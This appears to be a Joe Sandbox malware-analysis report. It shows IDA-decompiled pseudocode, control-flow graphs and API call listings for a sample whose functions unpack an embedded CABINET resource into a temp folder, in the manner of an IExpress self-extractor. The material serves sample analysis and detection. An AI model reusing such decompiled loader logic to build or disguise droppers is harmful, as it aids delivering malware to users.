                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0x8d9a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0x8d9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0x8d9a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0x8d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0x8d9124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E008D268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0x8d9a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0x8d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x8d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0x8d9a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E008D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x008d59d1
                                                                                                                                                                                                                                            0x008d59d6
                                                                                                                                                                                                                                            0x008d5c05
                                                                                                                                                                                                                                            0x008d5c14
                                                                                                                                                                                                                                            0x008d5c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008D59A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 008D59AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 008D5A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 008D5A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 008D5A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D5A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008D5A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 008D5AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 008D5BFC
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: 3bd6f11539b7884d6599ded09a19685e6bac7946f4b50f0dc08ef541c983a2c6
                                                                                                                                                                                                                                            • Instruction ID: 5944486e1c69bb054bbe0db96c143ff829c193ad51d4b24572aac030da28639f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bd6f11539b7884d6599ded09a19685e6bac7946f4b50f0dc08ef541c983a2c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C871A1B190161CAFEB15DB64CC85FFA77ACFB48354F1442ABF446D6240EB309E848B21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 374 8d4fe0-8d501a call 8d468f FindResourceA LoadResource LockResource 377 8d5161-8d5163 374->377 378 8d5020-8d5027 374->378 379 8d5029-8d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 8d5057-8d505e call 8d4efd 378->380 379->380 383 8d507c-8d50b4 380->383 384 8d5060-8d5077 call 8d44b9 380->384 389 8d50e8-8d5104 call 8d44b9 383->389 390 8d50b6-8d50da 383->390 388 8d5107-8d510e 384->388 392 8d511d-8d511f 388->392 393 8d5110-8d5117 FreeResource 388->393 399 8d5106 389->399 398 8d50dc 390->398 390->399 395 8d513a-8d5141 392->395 396 8d5121-8d5127 392->396 393->392 401 8d515f 395->401 402 8d5143-8d514a 395->402 396->395 400 8d5129-8d5135 call 8d44b9 396->400 405 8d50e3-8d50e6 398->405 399->388 400->395 401->377 402->401 404 8d514c-8d5159 SendMessageA 402->404 404->401 405->389 405->399
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E008D4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0x8d9144 = E008D468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0x8d9140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0x8d8584, 0x841), 5);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E008D4EFD(0, 0);
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E008D4CA0, E008D4CC0, E008D4980, E008D4A50, E008D4AD0, E008D4B60, E008D4BC0, 1, 0x8d9148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0x8d9148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            						E008D44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0x8d1140, 0, E008D4CD0, 0, 0x8d9140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            					E008D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0x8d9140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0x8d9140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0x8d91d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E008D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0x8d8a38 & 0x00000001) == 0 && ( *0x8d9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0x8d8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 008D4FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 008D5006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 008D500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 008D5030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 008D5037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 008D504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 008D5051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 008D5111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 008D5159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: 3baf0877e3716733b3c047f3f765178eaea80065527b7beab761d86722756f5e
                                                                                                                                                                                                                                            • Instruction ID: 67cf2633ca505f47dcccd4d286d3b653803215e0f6ea6a6caaeaea9a51ad9ef1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3baf0877e3716733b3c047f3f765178eaea80065527b7beab761d86722756f5e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E31E570642712BBEB205B65EC8AF27376CFB08B55F140327F952E23A1DAB98C408665
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 450 8d2f1d-8d2f3d 451 8d2f6c-8d2f73 call 8d5164 450->451 452 8d2f3f-8d2f46 450->452 460 8d2f79-8d2f80 call 8d55a0 451->460 461 8d3041 451->461 454 8d2f5f-8d2f66 call 8d3a3f 452->454 455 8d2f48 call 8d51e5 452->455 454->451 454->461 462 8d2f4d-8d2f4f 455->462 460->461 468 8d2f86-8d2fbe GetSystemDirectoryA call 8d658a LoadLibraryA 460->468 464 8d3043-8d3053 call 8d6ce0 461->464 462->461 465 8d2f55-8d2f5d 462->465 465->451 465->454 472 8d2ff7-8d3004 FreeLibrary 468->472 473 8d2fc0-8d2fd4 GetProcAddress 468->473 474 8d3017-8d3024 SetCurrentDirectoryA 472->474 475 8d3006-8d300c 472->475 473->472 476 8d2fd6-8d2fee DecryptFileA 473->476 478 8d3054-8d305a 474->478 479 8d3026-8d303c call 8d44b9 call 8d6285 474->479 475->474 477 8d300e call 8d621e 475->477 476->472 490 8d2ff0-8d2ff5 476->490 486 8d3013-8d3015 477->486 483 8d305c call 8d3b26 478->483 484 8d3065-8d306c 478->484 479->461 491 8d3061-8d3063 483->491 487 8d307c-8d3089 484->487 488 8d306e-8d3075 call 8d256d 484->488 486->461 486->474 493 8d308b-8d3091 487->493 494 8d30a1-8d30a9 487->494 496 8d307a 488->496 490->472 491->461 491->484 493->494 497 8d3093 call 8d3ba2 493->497 499 8d30ab-8d30ad 494->499 500 8d30b4-8d30b7 494->500 496->487 503 8d3098-8d309a 497->503 499->500 502 8d30af call 8d4169 499->502 500->464 502->500 503->461 505 8d309c 503->505 505->494
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E008D2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x8d8004; // 0x12cb0cef
				_v8 = _t9 ^ _t46;
				if( *0x8d8a38 != 0) {
					L5:
					_t11 = E008D5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E008D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E008D55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E008D658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x8da288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x8d8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x8d8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x8d8d48 & 0x000000c0;
									if(( *0x8d8d48 & 0x000000c0) == 0) {
										_t41 =  *0x8d9a40; // 0x3, executed
										_t26 = E008D256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x8d8a24; // 0x0
									 *0x8d9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x8d8a38;
										if( *0x8d8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E008D4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x8d9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E008D3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x8d8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E008D3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E008D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x8d9124 = E008D6285();
							goto L16;
						}
						_t59 =  *0x8d9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E008D621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x8d8a24;
				if( *0x8d8a24 != 0) {
					L4:
					_t34 = E008D3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
                                                                                                                                                                                                                                            				if(E008D51E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0x8d8a38;
                                                                                                                                                                                                                                            				if( *0x8d8a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D2F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 008D2FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 008D2FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 008D2FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008D2FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D301C
                                                                                                                                                                                                                                              • Part of subcall function 008D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008D2F4D,?,00000002,00000000), ref: 008D5201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-1173327654
                                                                                                                                                                                                                                            • Opcode ID: 31d0655f5eb9cb13aed371efe0743e0514ac15230e8ee6012ac08e8bbb0a05d7
                                                                                                                                                                                                                                            • Instruction ID: c9e5d72aca0dbea867e5b48159064b9c4a649295cee2e28cea3337c118b37f11
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d0655f5eb9cb13aed371efe0743e0514ac15230e8ee6012ac08e8bbb0a05d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5241C631A01A25DBDB34AB7AAC45B6A33B8FB54750F100767E941C2391EF74CE80CA63
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 522 8d5467-8d5484 523 8d551c-8d5528 call 8d1680 522->523 524 8d548a-8d5490 call 8d53a1 522->524 528 8d552d-8d5539 call 8d58c8 523->528 527 8d5495-8d5497 524->527 529 8d549d-8d54c0 call 8d1781 527->529 530 8d5581-8d5583 527->530 537 8d554d-8d5552 528->537 538 8d553b-8d5545 CreateDirectoryA 528->538 539 8d550c-8d551a call 8d658a 529->539 540 8d54c2-8d54d8 GetSystemInfo 529->540 533 8d558d-8d559d call 8d6ce0 530->533 544 8d5585-8d558b 537->544 545 8d5554-8d5557 call 8d597d 537->545 542 8d5577-8d557c call 8d6285 538->542 543 8d5547 538->543 539->528 548 8d54fe 540->548 549 8d54da-8d54dd 540->549 542->530 543->537 544->533 555 8d555c-8d555e 545->555 556 8d5503-8d5507 call 8d658a 548->556 553 8d54df-8d54e2 549->553 554 8d54f7-8d54fc 549->554 557 8d54e4-8d54e7 553->557 558 8d54f0-8d54f5 553->558 554->556 555->544 559 8d5560-8d5566 555->559 556->539 557->539 561 8d54e9-8d54ee 557->561 558->556 559->530 562 8d5568-8d5575 RemoveDirectoryA 559->562 561->556 562->530
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E008D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0x8d91e4;
